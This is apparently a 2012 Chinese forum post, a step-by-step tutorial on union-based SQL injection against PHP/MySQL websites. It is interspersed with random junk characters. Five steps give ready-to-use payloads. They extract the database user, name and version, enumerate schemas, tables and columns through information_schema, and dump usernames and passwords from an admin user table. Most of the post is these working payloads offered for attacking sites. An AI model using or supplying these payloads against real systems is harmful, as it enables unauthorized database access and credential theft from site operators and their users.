/ T9 J/ C3 R& ]0 G教程内容:Mysql 5+php 注入$ H6 ?$ s- n' Z* J8 |2 J" R# _) Y! S
( |- `" B4 L6 w$ V& p6 Q
) |6 F8 A5 x1 J/ n; o( m7 P
! Z7 v% I m" O7 J7 ~1 l一.查看MYSQL基本信息(库名,版本,用户)) F3 W+ I/ Q2 D; q3 b2 x
- z2 s$ f9 X/ U. ~
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
8 q3 f' R7 l: f0 a+ ]3 D' S& R, g' L* Q% `( m+ C
二.查数据库. \& x6 K) q2 x( m% w6 H$ O" c: s
9 L9 c1 `3 F! i. h* m: W" Sand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
# m# I8 n, s# ]8 ]1 Llimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
, S1 r# b3 B1 |. S4 `: k! B6 ?3 J( [+ G
三.暴表
4 v& D) \5 T7 J: e8 H. z$ q6 f+ G! y9 W% j) |
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
9 ~& ^5 F8 y+ o+ }
5 A# P1 l2 O: x* Y4 Glimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
6 J' h1 e1 ?3 k; L8 x+ x$ h1 l5 F* A# `8 v3 @% v1 k
四.暴字段
7 H1 X# T: W$ A& B3 a
7 r' i0 g' x/ n6 u Cand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
' L+ }' c3 v% q0 O
. v. C! ]7 Q8 U, alimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。' c! [* ~0 F2 X9 R
' ~8 f! C/ X% P* i. L5 a% R
五.暴数据
& \7 d' J' m0 E0 t
* B! F( ]3 q; Iand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
8 Y9 _: h& N$ x9 D
; R7 A" ?; M0 J1 `7 r3 B! H: @6 w
/ p6 n* v( T: z这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。9 F# f8 ^" b& V7 v
|
发表于 2012-9-13 16:27:53
收藏
支持
反对